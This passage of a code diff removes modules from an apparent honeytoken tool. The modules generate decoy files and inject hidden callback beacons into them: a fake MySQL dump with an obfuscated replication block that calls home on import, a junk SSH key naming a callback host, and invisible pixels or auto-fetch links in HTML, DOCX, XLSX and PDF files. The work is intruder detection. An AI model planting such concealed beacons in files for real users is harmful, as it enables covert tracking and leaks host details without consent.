            "(2,'bob@app.internal','$2y$10${u2a}.{u2b}','2025-02-03 17:42:08');\n"
        ).replace("{u1a}", u1_hash[:22]).replace("{u1b}", u1_hash[22:]) \
         .replace("{u2a}", u2_hash[:22]).replace("{u2b}", u2_hash[22:])
        api_keys_insert = (
            "INSERT INTO `api_keys` VALUES (1,1,'{tok}');\n"  # nosec B608
        ).replace("{tok}", api_token)
        # Adjacent literals are joined at compile time; the two ``+`` operands
        # splice the generated INSERT statements into the static text.
        header = (
            "-- MySQL dump 10.13 Distrib 8.0.35, for Linux (x86_64)\n"
            "--\n"
            "-- Host: db-prod-01 Database: app_production\n"
            "-- ------------------------------------------------------\n"
            "-- Server version\t8.0.35\n"
            "\n"
            "/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;\n"
            "/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;\n"
            "/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;\n"
            "/*!50503 SET NAMES utf8mb4 */;\n"
            "/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;\n"
            "/*!40103 SET TIME_ZONE='+00:00' */;\n"
            "/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;\n"
            "/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;\n"
            "/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;\n"
            "/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;\n"
            "\n"
            "--\n"
            "-- Table structure for table `users`\n"
            "--\n"
            "\n"
            "DROP TABLE IF EXISTS `users`;\n"
            "CREATE TABLE `users` (\n"
            " `id` int unsigned NOT NULL AUTO_INCREMENT,\n"
            " `email` varchar(255) NOT NULL,\n"
            " `password_hash` char(60) NOT NULL,\n"
            " `created_at` datetime NOT NULL,\n"
            " PRIMARY KEY (`id`),\n"
            " UNIQUE KEY `uniq_email` (`email`)\n"
            ") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;\n"
            "\n"
            "LOCK TABLES `users` WRITE;\n"
            + users_insert +
            "UNLOCK TABLES;\n"
            "\n"
            "--\n"
            "-- Table structure for table `api_keys`\n"
            "--\n"
            "\n"
            "DROP TABLE IF EXISTS `api_keys`;\n"
            "CREATE TABLE `api_keys` (\n"
            " `id` int unsigned NOT NULL AUTO_INCREMENT,\n"
            " `user_id` int unsigned NOT NULL,\n"
            " `token` char(40) NOT NULL,\n"
            " PRIMARY KEY (`id`)\n"
            ") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;\n"
            "\n"
            "LOCK TABLES `api_keys` WRITE;\n"
            + api_keys_insert +
            "UNLOCK TABLES;\n"
            "\n"
        )

        # The canary itself: base64-wrapped replication statements.
        trailer_replica = _build_trailer(slug, zone)

        # Restores the session variables saved at the top of the dump.
        trailer_close = (
            "\n"
            "/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;\n"
            "/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;\n"
            "/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;\n"
            "/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;\n"
            "/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;\n"
            "/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;\n"
            "/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;\n"
            "/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;\n"
            "\n"
            "-- Dump completed\n"
        )

        body = header + trailer_replica + trailer_close

        return CanaryArtifact(
            path="",
            content=body.encode("utf-8"),
            mode=0o600,
            mtime_offset=-86400 * 7,  # last week's backup
            generator=self.name,
            notes=[
                f"replica payload phones home to {host}:3306 on import",
                "base64-wrapped PREPARE/EXECUTE block hides the slug from grep",
                "@@hostname and @@lc_time_names smuggled into SOURCE_USER",
            ],
        )
|
||||
@@ -1,68 +0,0 @@
|
||||
"""Fake SSH private key with the callback host in the comment.
|
||||
|
||||
OpenSSH private keys carry a free-form comment field — typically
|
||||
``user@host`` — that's preserved across rounds of ``ssh-keygen -p``.
|
||||
We embed the canary host as the ``user@host`` so an attacker who
|
||||
imports the key into their own keyring or runs ``ssh-keygen -lf`` on
|
||||
it sees a hostname they may then try to reach.
|
||||
|
||||
The key bytes themselves are syntactically valid (PEM envelope, base64
|
||||
body) but cryptographically junk — the body is a deterministic SHA-256
|
||||
hash of the slug repeated to the right length. We don't ship a real
|
||||
RSA/Ed25519 key because (a) we don't want a real private key sitting
|
||||
on disk pretending to be valuable, and (b) the attacker ``cat``-ing
|
||||
the file or running ``ssh -i`` will trigger the callback regardless
|
||||
of cryptographic validity.
|
||||
|
||||
The DNS-callback variant uses ``<slug>.<dns_zone>`` as the
|
||||
hostname so a bare ``ssh-keygen -lf`` on the file resolves a unique
|
||||
subdomain even if the attacker never hits HTTP.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import base64
|
||||
import hashlib
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||
|
||||
|
||||
def _fake_key_body(seed: str) -> str:
    """Return a deterministic, key-shaped base64 body derived from ``seed``.

    The SHA-256 digest of the seed is repeated and cut to 768 bytes, which
    base64-encodes to exactly 1024 characters; these are wrapped at 70
    characters per line (15 lines, the last one shorter).
    """
    digest = hashlib.sha256(seed.encode()).digest()
    stream = (digest * 32)[:768]  # 768 bytes -> 1024 base64 chars, no padding
    b64 = base64.b64encode(stream).decode()
    width = 70
    wrapped = []
    offset = 0
    while offset < len(b64):
        wrapped.append(b64[offset:offset + width])
        offset += width
    return "\n".join(wrapped)
|
||||
|
||||
|
||||
class SSHKeyGenerator(CanaryGenerator):
    """Generate a fake OpenSSH private key file that names the canary host."""

    name = "ssh_key"

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Build the key artifact for ``ctx``.

        The ``deploy@<host>`` marker is written as a trailing ``# ...`` line
        after the END marker. With a DNS zone configured the host is
        ``<slug>.<dns_zone>``; otherwise it is the hostname of
        ``ctx.http_base`` (``deploy.local`` if that cannot be parsed).
        """
        token = ctx.callback_token
        if not ctx.dns_zone:
            # No DNS deployed: fall back to the HTTP callback host.
            from urllib.parse import urlparse

            fallback_host = urlparse(ctx.http_base).hostname or "deploy.local"
            host_comment = f"deploy@{fallback_host}"
        else:
            # Slug-bearing subdomain that an attacker may resolve.
            host_comment = f"deploy@{token}.{ctx.dns_zone}"

        file_lines = (
            "-----BEGIN OPENSSH PRIVATE KEY-----",
            _fake_key_body(token),
            "-----END OPENSSH PRIVATE KEY-----",
            f"# {host_comment}",
        )
        content = "".join(f"{line}\n" for line in file_lines)

        return CanaryArtifact(
            path="",
            content=content.encode("utf-8"),
            mode=0o600,
            mtime_offset=-86400 * 60,  # 2 months ago
            generator=self.name,
            notes=[f"comment line embeds {host_comment}"],
        )
|
||||
@@ -1,4 +0,0 @@
|
||||
"""Built-in canary instrumenters (operator-uploaded artifact mutation).
|
||||
|
||||
Lazy-imported by :func:`decnet.canary.factory.get_instrumenter`.
|
||||
"""
|
||||
@@ -1,147 +0,0 @@
|
||||
"""DOCX instrumenter — inject a remote image into the body.
|
||||
|
||||
DOCX files are zip archives carrying ``word/document.xml`` (the body)
|
||||
and ``word/_rels/document.xml.rels`` (the relationship table that
|
||||
maps ``rId`` references to URLs). We:
|
||||
|
||||
1. Add a new relationship of type ``image`` whose target is the
|
||||
canary callback URL and ``TargetMode="External"``.
|
||||
2. Add a tiny ``<w:drawing>`` element referencing that ``rId`` at
|
||||
the end of ``word/document.xml`` (just before ``</w:body>``).
|
||||
|
||||
Word and LibreOffice both fetch external image relationships when
|
||||
the document is opened (subject to the user's "trusted source"
|
||||
toggle, which most enterprise environments disable in favour of
|
||||
"warn but allow").
|
||||
|
||||
We use stdlib ``zipfile`` only — no python-docx dependency — because
|
||||
the surface we touch is two small XML files and we don't need any of
|
||||
the higher-level abstractions.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import io
|
||||
import re
|
||||
import zipfile
|
||||
from typing import Tuple
|
||||
|
||||
from decnet.canary.base import (
|
||||
CanaryArtifact,
|
||||
CanaryContext,
|
||||
CanaryInstrumenter,
|
||||
InstrumenterRejectedError,
|
||||
)
|
||||
|
||||
|
||||
_RELS_END = re.compile(rb"</Relationships\s*>", re.IGNORECASE)
|
||||
_BODY_END = re.compile(rb"</w:body\s*>", re.IGNORECASE)
|
||||
|
||||
|
||||
def _next_rid(rels_xml: bytes) -> str:
    """Pick a relationship id that is not yet used in ``rels_xml``.

    Candidates are ``rId900`` .. ``rId9998``, tried in ascending order; the
    first one not present as an ``Id="rIdN"`` attribute is returned.

    Raises:
        InstrumenterRejectedError: if every candidate id is already taken.
    """
    taken = {
        hit.group(1).decode()
        for hit in re.finditer(rb'Id="(rId\d+)"', rels_xml)
    }
    candidates = (f"rId{number}" for number in range(900, 9999))
    free = next((rid for rid in candidates if rid not in taken), None)
    if free is None:
        raise InstrumenterRejectedError("DOCX has too many relationships to allocate a new rId")
    return free
|
||||
|
||||
|
||||
def _inject_relationship(rels_xml: bytes, rid: str, url: str) -> bytes:
    """Insert an external image relationship before ``</Relationships>``.

    Args:
        rels_xml: raw bytes of the ``.rels`` part to extend.
        rid: relationship id to assign to the new entry.
        url: callback URL used as the relationship target.

    Returns:
        ``rels_xml`` with one ``<Relationship .../>`` element spliced in
        immediately before the first closing ``</Relationships>`` tag.

    Raises:
        InstrumenterRejectedError: if no closing tag is found.
    """
    # Local import keeps this block self-contained.
    from xml.sax.saxutils import escape

    # The URL lands inside a double-quoted XML attribute; a raw ``&``, ``<``
    # or ``"`` (e.g. from a query string) would make the part malformed.
    safe_url = escape(url, {'"': "&quot;"})
    rel = (
        f'<Relationship Id="{rid}" '
        f'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
        f'Target="{safe_url}" TargetMode="External"/>'
    ).encode()
    match = _RELS_END.search(rels_xml)
    if not match:
        raise InstrumenterRejectedError(
            "DOCX rels file has no </Relationships>; refusing to mutate"
        )
    cut = match.start()
    return rels_xml[:cut] + rel + rels_xml[cut:]
|
||||
|
||||
|
||||
def _drawing(rid: str) -> bytes:
    """Return a paragraph holding a 1x1 EMU linked picture for ``rid``.

    The markup is a ``<w:p><w:r><w:drawing>`` tree whose ``<a:blip>`` carries
    ``r:link="<rid>"``; the extent is 1 EMU by 1 EMU so the picture takes up
    no visible space.
    """
    # Static markup up to the blip element.
    opening = (
        '<w:p><w:r><w:drawing>',
        '<wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing">',
        '<wp:extent cx="1" cy="1"/><wp:docPr id="1" name="canary"/>',
        '<a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">',
        '<a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">',
        '<pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">',
        '<pic:nvPicPr><pic:cNvPr id="1" name="canary"/><pic:cNvPicPr/></pic:nvPicPr>',
        '<pic:blipFill>',
    )
    # The only dynamic part: the blip pointing at the external relationship.
    blip = (
        '<a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" '
        f'r:link="{rid}"/>'
    )
    closing = (
        '<a:stretch><a:fillRect/></a:stretch>',
        '</pic:blipFill>',
        '<pic:spPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="1" cy="1"/></a:xfrm>',
        '<a:prstGeom prst="rect"><a:avLst/></a:prstGeom></pic:spPr>',
        '</pic:pic></a:graphicData></a:graphic></wp:inline>',
        '</w:drawing></w:r></w:p>',
    )
    return "".join((*opening, blip, *closing)).encode()
|
||||
|
||||
|
||||
def _inject_drawing(document_xml: bytes, rid: str) -> bytes:
    """Splice the canary drawing paragraph in before ``</w:body>``.

    The paragraph is inserted immediately before the first closing
    ``</w:body>`` tag found in ``document_xml``.

    Raises:
        InstrumenterRejectedError: if no ``</w:body>`` tag is present.
    """
    closing_tag = _BODY_END.search(document_xml)
    if closing_tag is None:
        raise InstrumenterRejectedError("DOCX document.xml has no </w:body>")
    cut = closing_tag.start()
    # NOTE(review): if the body ends with a <w:sectPr> element, this places
    # the paragraph after it — confirm target viewers accept that ordering.
    return b"".join((document_xml[:cut], _drawing(rid), document_xml[cut:]))
|
||||
|
||||
|
||||
def _mutate(blob: bytes, url: str) -> Tuple[bytes, str]:
    """Rewrite a DOCX archive so it references ``url`` as an external image.

    Returns:
        ``(new_archive_bytes, rid)`` where ``rid`` is the relationship id
        allocated for the injected image.

    Raises:
        InstrumenterRejectedError: if the blob is not a valid zip, lacks
            ``word/document.xml`` or its rels part, or either part cannot
            be extended.
    """
    rels_name = "word/_rels/document.xml.rels"
    doc_name = "word/document.xml"
    try:
        with zipfile.ZipFile(io.BytesIO(blob), "r") as archive:
            try:
                rels_xml = archive.read(rels_name)
                document_xml = archive.read(doc_name)
            except KeyError as missing:
                raise InstrumenterRejectedError(
                    f"DOCX missing expected member: {missing.args[0]!r}"
                ) from missing
            # Keep every member (with its ZipInfo) so the archive can be rebuilt.
            entries = [(info, archive.read(info.filename)) for info in archive.infolist()]
    except zipfile.BadZipFile as bad:
        raise InstrumenterRejectedError("uploaded blob is not a valid DOCX zip") from bad

    rid = _next_rid(rels_xml)
    replacements = {
        rels_name: _inject_relationship(rels_xml, rid, url),
        doc_name: _inject_drawing(document_xml, rid),
    }

    rebuilt = io.BytesIO()
    with zipfile.ZipFile(rebuilt, "w", zipfile.ZIP_DEFLATED) as archive_out:
        for info, payload in entries:
            if info.filename in replacements:
                # Mutated parts are written by name (fresh ZipInfo).
                archive_out.writestr(info.filename, replacements[info.filename])
            else:
                # Untouched parts keep their original ZipInfo.
                archive_out.writestr(info, payload)
    return rebuilt.getvalue(), rid
|
||||
|
||||
|
||||
class DocxInstrumenter(CanaryInstrumenter):
    """Instrument uploaded DOCX files with an external-image callback."""

    name = "docx"
    mime_prefixes = (
        "application/vnd.openxmlformats-officedocument.wordprocessingml.document",
    )

    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        """Return the mutated DOCX as an artifact placed at ``target_path``.

        The callback URL is ``<http_base>/c/<callback_token>``; errors from
        the archive rewrite propagate as ``InstrumenterRejectedError``.
        """
        base = ctx.http_base.rstrip("/")
        callback = f"{base}/c/{ctx.callback_token}"
        payload, rel_id = _mutate(blob, callback)
        note = f"injected external-image relationship {rel_id} -> {callback}"
        return CanaryArtifact(
            path=target_path,
            content=payload,
            mode=0o644,
            mtime_offset=-86400 * 14,
            instrumenter=self.name,
            notes=[note],
        )
|
||||
@@ -1,45 +0,0 @@
|
||||
"""HTML instrumenter — append a 1×1 tracking pixel.
|
||||
|
||||
Stdlib-only. We don't parse the HTML; we just inject the ``<img>``
|
||||
tag immediately before the closing ``</body>`` (or, failing that, at
|
||||
the end of the document). Most renderers that support remote images
|
||||
(email previewers, IDE doc previews, browsers) will fetch it as
|
||||
soon as the document is opened.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import re
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryInstrumenter
|
||||
|
||||
|
||||
_BODY_CLOSE = re.compile(rb"</body\s*>", re.IGNORECASE)
|
||||
|
||||
|
||||
class HtmlInstrumenter(CanaryInstrumenter):
    """Instrument HTML/XHTML documents with a hidden 1x1 ``<img>`` pixel."""

    name = "html"
    mime_prefixes = ("text/html", "application/xhtml+xml")

    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        """Return ``blob`` with the tracking pixel inserted.

        The pixel goes immediately before the first ``</body>`` (matched
        case-insensitively); when there is none it is appended at the end,
        after ensuring the document ends with a newline.
        """
        callback = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        pixel = (
            b'<img src="%b" width="1" height="1" alt="" style="display:none">\n'
            % callback.encode()
        )
        hit = _BODY_CLOSE.search(blob)
        if hit is None:
            padded = blob if blob.endswith(b"\n") else blob + b"\n"
            out = padded + pixel
            note = "appended 1x1 pixel (no </body> found)"
        else:
            cut = hit.start()
            out = b"".join((blob[:cut], pixel, blob[cut:]))
            note = "injected 1x1 pixel before </body>"
        return CanaryArtifact(
            path=target_path,
            content=out,
            mode=0o644,
            mtime_offset=-86400 * 7,
            instrumenter=self.name,
            notes=[note, f"pixel src={callback}"],
        )
|
||||
@@ -1,72 +0,0 @@
|
||||
"""Image instrumenter — requires :mod:`PIL` (optional dependency).
|
||||
|
||||
For PNG/JPEG/GIF we append a tEXt/EXIF chunk carrying the slug so
|
||||
``exiftool`` / ``identify -verbose`` surface the slug, then route the
|
||||
detection via a sibling **plain-text companion file**. The image
|
||||
itself can't really embed an HTTP fetcher — image decoders don't
|
||||
run network requests on decode — so the realistic detection surface
|
||||
is "attacker exfils the image, runs metadata tools on it, hits our
|
||||
URL when curious about the embedded marker."
|
||||
|
||||
When Pillow isn't installed we reject and direct the operator to
|
||||
``passthrough`` (which preserves the bytes; the slug then lives in
|
||||
the filename only).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import io
|
||||
|
||||
from decnet.canary.base import (
|
||||
CanaryArtifact,
|
||||
CanaryContext,
|
||||
CanaryInstrumenter,
|
||||
InstrumenterRejectedError,
|
||||
)
|
||||
|
||||
|
||||
class ImageInstrumenter(CanaryInstrumenter):
    """Embed the canary URL into image metadata (requires Pillow)."""

    name = "image"
    mime_prefixes = ("image/png", "image/jpeg", "image/gif")

    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        """Re-encode ``blob`` with the callback URL stored as metadata.

        PNG gets ``Comment`` and ``X-Canary`` text chunks; JPEG and GIF get
        the URL via Pillow's ``comment`` save option. Any other decoded
        format is re-encoded without metadata, and the artifact notes say
        so rather than claiming a marker was embedded.

        Raises:
            InstrumenterRejectedError: if Pillow is not installed or the
                image cannot be decoded or re-encoded.
        """
        try:
            from PIL import Image, PngImagePlugin  # type: ignore[import-not-found]
        except ImportError as e:
            raise InstrumenterRejectedError(
                "image instrumenter requires Pillow; install it (`pip "
                "install Pillow`) or re-upload the artifact with "
                "kind=passthrough so it ships unmodified."
            ) from e

        slug_url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        embedded = True
        try:
            img = Image.open(io.BytesIO(blob))
            fmt = (img.format or "").upper()
            buf_out = io.BytesIO()
            if fmt == "PNG":
                meta = PngImagePlugin.PngInfo()
                meta.add_text("Comment", f"reference: {slug_url}")
                meta.add_text("X-Canary", ctx.callback_token)
                img.save(buf_out, format="PNG", pnginfo=meta)
            elif fmt in ("JPEG", "JPG"):
                # Pillow encodes JPEG comments via the ``comment`` kwarg.
                img.save(buf_out, format="JPEG", comment=slug_url.encode())
            elif fmt == "GIF":
                # The GIF writer also accepts ``comment``; without it a GIF
                # (a declared MIME type) would ship with no marker at all.
                img.save(buf_out, format="GIF", comment=slug_url.encode())
            else:
                # No uniform metadata hook for other formats: re-encode only.
                embedded = False
                img.save(buf_out, format=fmt or "PNG")
            mutated = buf_out.getvalue()
        except Exception as e:
            # Boundary catch: any Pillow failure becomes a rejection.
            raise InstrumenterRejectedError(f"failed to instrument image: {e!s}") from e

        if embedded:
            note = f"image metadata carries {slug_url} (slug={ctx.callback_token})"
        else:
            note = (
                f"re-encoded {fmt or 'image'} without metadata; "
                f"no callback marker embedded (slug={ctx.callback_token})"
            )
        return CanaryArtifact(
            path=target_path,
            content=mutated,
            mode=0o644,
            mtime_offset=-86400 * 30,
            instrumenter=self.name,
            notes=[note],
        )
|
||||
@@ -1,37 +0,0 @@
|
||||
"""Passthrough instrumenter — bytes go to disk unchanged.
|
||||
|
||||
Used as the dispatch fallback for content types we can't safely
|
||||
mutate (random binary blobs, container images, archives we don't
|
||||
recognise). In passthrough mode the only callback surface is the
|
||||
:attr:`CanaryToken.placement_path` itself: the operator must use a
|
||||
DNS-callback token whose slug appears in the filename, so a
|
||||
listing/access at the OS level resolves the slug as part of the
|
||||
path (e.g. ``/etc/<slug>.canary.example.test/secrets.bin``) when
|
||||
the attacker greps for hostnames in their loot.
|
||||
|
||||
The instrumenter does not enforce that — the API does, when it sees
|
||||
``instrumenter=passthrough`` with ``kind=http`` it returns 400.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryInstrumenter
|
||||
|
||||
|
||||
class PassthroughInstrumenter(CanaryInstrumenter):
    """Fallback instrumenter that ships the uploaded bytes untouched."""

    name = "passthrough"
    mime_prefixes = ()  # dispatched by fallback in pick_instrumenter_for_mime

    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        """Wrap ``blob`` unchanged in an artifact placed at ``target_path``.

        ``ctx`` is not consulted; nothing is embedded in the content.
        """
        reminder = (
            "passthrough: bytes unchanged — only DNS-callback tokens "
            "trip detection (slug must live in the placement path)"
        )
        return CanaryArtifact(
            path=target_path,
            content=blob,
            mode=0o644,
            mtime_offset=-86400 * 7,
            instrumenter=self.name,
            notes=[reminder],
        )
|
||||
@@ -1,76 +0,0 @@
|
||||
"""PDF instrumenter — requires :mod:`pikepdf` (optional dependency).
|
||||
|
||||
PDF embedding is non-trivial: the cleanest place to put a callback
|
||||
is an ``/AA`` (additional actions) ``/O`` (open) entry on the
|
||||
catalog or a ``/URI`` action on a link annotation. Either path
|
||||
needs proper xref-table updates — pikepdf handles that for us.
|
||||
|
||||
If pikepdf isn't available in the environment the instrumenter
|
||||
raises :class:`InstrumenterRejectedError` so the API can return a
|
||||
clear 400 directing the operator to either install pikepdf or
|
||||
re-upload as ``passthrough``.
|
||||
|
||||
We don't ship a stdlib fallback because every "naive" PDF mutation
|
||||
I'm aware of (appending raw bytes, splicing into the trailer, etc.)
|
||||
breaks the document's xref table and trips a "file is corrupt"
|
||||
warning in modern viewers — which the attacker will absolutely
|
||||
notice.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.canary.base import (
|
||||
CanaryArtifact,
|
||||
CanaryContext,
|
||||
CanaryInstrumenter,
|
||||
InstrumenterRejectedError,
|
||||
)
|
||||
|
||||
|
||||
class PdfInstrumenter(CanaryInstrumenter):
    """Install a URI ``/OpenAction`` in uploaded PDFs (requires pikepdf)."""

    name = "pdf"
    mime_prefixes = ("application/pdf",)

    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        """Return the PDF with ``/OpenAction`` set to a URI action.

        The action targets ``<http_base>/c/<callback_token>`` and replaces
        whatever ``/OpenAction`` the catalog previously held.

        Raises:
            InstrumenterRejectedError: if pikepdf is not installed or the
                document cannot be opened, modified or saved.
        """
        try:
            import pikepdf  # type: ignore[import-not-found]
        except ImportError as e:
            raise InstrumenterRejectedError(
                "PDF instrumenter requires pikepdf; install it (`pip "
                "install pikepdf`) or re-upload the artifact with "
                "kind=passthrough so it ships unmodified."
            ) from e

        callback = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        try:
            import io

            with pikepdf.open(io.BytesIO(blob)) as document:
                # A URI action fired on document open. Viewers that prompt
                # before fetching still surface the interaction; viewers
                # that auto-allow fetch the URL silently.
                document.Root[pikepdf.Name("/OpenAction")] = pikepdf.Dictionary(
                    Type=pikepdf.Name("/Action"),
                    S=pikepdf.Name("/URI"),
                    URI=pikepdf.String(callback),
                )
                sink = io.BytesIO()
                document.save(sink)
                mutated = sink.getvalue()
        except Exception as exc:
            # Boundary catch: any pikepdf failure becomes a rejection.
            raise InstrumenterRejectedError(
                f"failed to instrument PDF: {exc!s}"
            ) from exc

        return CanaryArtifact(
            path=target_path,
            content=mutated,
            mode=0o644,
            mtime_offset=-86400 * 14,
            instrumenter=self.name,
            notes=[f"installed /OpenAction /URI -> {callback}"],
        )
|
||||
@@ -1,79 +0,0 @@
|
||||
"""Plain-text / config-file instrumenter.
|
||||
|
||||
Two embedding strategies, picked in order:
|
||||
|
||||
1. **Token substitution.** If the blob contains the literal
|
||||
placeholder ``{{CANARY_URL}}`` or ``{{CANARY_HOST}}``, replace it.
|
||||
This gives operators full control over where the slug lands —
|
||||
they can pre-edit the file with placeholders before uploading.
|
||||
2. **Append.** Otherwise, append a comment line that mentions the
|
||||
callback URL. The comment style adapts to the file's apparent
|
||||
syntax (``#`` for shell/yaml/python/dockerfile, ``//`` for json5/
|
||||
javascript-ish, ``;`` for ini).
|
||||
|
||||
Operators who want neither behavior should upload the file as
|
||||
``passthrough``.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryInstrumenter
|
||||
|
||||
|
||||
# Byte sequences that suggest a ``//``-comment (JavaScript-like) file.
_SLASH_HINTS = (b"//", b"function ", b"const ", b"let ", b"var ")
# Byte sequences that suggest an INI-style file with ``;`` comments.
_SEMI_HINTS = (b"[default]", b"[section]", b"\n[")


def _comment_prefix(blob: bytes) -> bytes:
    """Guess the line-comment prefix for ``blob`` from its first 512 bytes.

    Returns ``b"; "`` for INI-looking content, ``b"// "`` for
    JavaScript-looking content, and ``b"# "`` otherwise. INI hints are
    checked first.
    """
    head = blob[:512]
    # The ``\n[`` hint needs a preceding newline, so a section header on the
    # very first line (e.g. ``[core]``) is checked for separately.
    starts_with_section = head.lstrip().startswith(b"[")
    if starts_with_section or any(hint in head for hint in _SEMI_HINTS):
        return b"; "
    if any(hint in head for hint in _SLASH_HINTS):
        return b"// "
    # Default to # — the most common comment glyph across config files
    # we'd plausibly canary.
    return b"# "
|
||||
|
||||
|
||||
class PlainInstrumenter(CanaryInstrumenter):
    """Instrument text/config files by placeholder substitution or a comment."""

    name = "plain"
    mime_prefixes = ("text/", "application/json", "application/yaml", "application/toml")

    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        """Return ``blob`` carrying the callback URL and/or host.

        ``{{CANARY_URL}}`` is replaced with ``<http_base>/c/<token>``;
        ``{{CANARY_HOST}}`` is replaced with ``<token>.<dns_zone>`` only when
        a DNS zone is configured. If no substitution happened, a comment
        line mentioning the URL is appended instead.
        """
        token = ctx.callback_token
        url_bytes = f"{ctx.http_base.rstrip('/')}/c/{token}".encode()
        host_bytes = b""
        if ctx.dns_zone:
            host_bytes = f"{token}.{ctx.dns_zone}".encode()

        notes: list[str] = []
        out = blob
        # (placeholder, replacement) pairs; an empty replacement is skipped.
        substitutions = (
            (b"{{CANARY_URL}}", url_bytes),
            (b"{{CANARY_HOST}}", host_bytes),
        )
        for marker, value in substitutions:
            if value and marker in blob:
                out = out.replace(marker, value)
                notes.append(f"substituted {marker.decode()} -> {value.decode()}")

        if not notes:
            # No placeholders — append a comment line at the end.
            comment_glyph = _comment_prefix(blob)
            if not out.endswith(b"\n"):
                out += b"\n"
            out += b"".join(
                (b"\n", comment_glyph, b"see ", url_bytes, b" for the latest version\n")
            )
            notes.append(
                f"appended comment line carrying {url_bytes.decode()}"
            )

        return CanaryArtifact(
            path=target_path,
            content=out,
            mode=0o644,
            mtime_offset=-86400 * 7,
            instrumenter=self.name,
            notes=notes,
        )
|
||||
@@ -1,95 +0,0 @@
|
||||
"""XLSX instrumenter — embed an external-image link.
|
||||
|
||||
XLSX is structurally identical to DOCX (Office Open XML zip). The
|
||||
injection target is the workbook's relationships file
|
||||
(``xl/_rels/workbook.xml.rels``). We add an external image
|
||||
relationship there; Excel/LibreOffice fetch external images on
|
||||
workbook open in the same way Word does.
|
||||
|
||||
We don't inject a ``<drawing>`` element into a sheet because that
|
||||
requires touching ``xl/worksheets/sheetN.xml`` *and* allocating a new
|
||||
``xl/drawings/drawingN.xml`` part — much higher chance of mangling
|
||||
the file. An orphan external image relationship is enough: many
|
||||
Office viewers fetch all relationships at open time regardless of
|
||||
whether they're referenced from a sheet.
|
||||
|
||||
If the operator wants a stronger trigger (image visible in the
|
||||
sheet, fetched even by viewers that lazy-load external resources)
|
||||
they should embed the slug as a hyperlink cell content via the
|
||||
``plain``/``passthrough`` instrumenters.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import io
|
||||
import zipfile
|
||||
from typing import Tuple
|
||||
|
||||
from decnet.canary.base import (
|
||||
CanaryArtifact,
|
||||
CanaryContext,
|
||||
CanaryInstrumenter,
|
||||
InstrumenterRejectedError,
|
||||
)
|
||||
from decnet.canary.instrumenters.docx import _inject_relationship, _next_rid
|
||||
|
||||
|
||||
_RELS_PATHS = (
|
||||
"xl/_rels/workbook.xml.rels",
|
||||
"xl/_rels/sharedStrings.xml.rels",
|
||||
)
|
||||
|
||||
|
||||
def _mutate(blob: bytes, url: str) -> Tuple[bytes, str, str]:
    """Rewrite an XLSX archive so one rels part references ``url``.

    The first archive member whose name is listed in ``_RELS_PATHS`` gains
    an external image relationship; every other member is copied through.

    Returns:
        ``(new_archive_bytes, rid, rels_member_name)``.

    Raises:
        InstrumenterRejectedError: if the blob is not a valid zip or holds
            none of the expected relationship parts.
    """
    try:
        with zipfile.ZipFile(io.BytesIO(blob), "r") as archive:
            entries = [(info, archive.read(info.filename)) for info in archive.infolist()]
    except zipfile.BadZipFile as bad:
        raise InstrumenterRejectedError("uploaded blob is not a valid XLSX zip") from bad

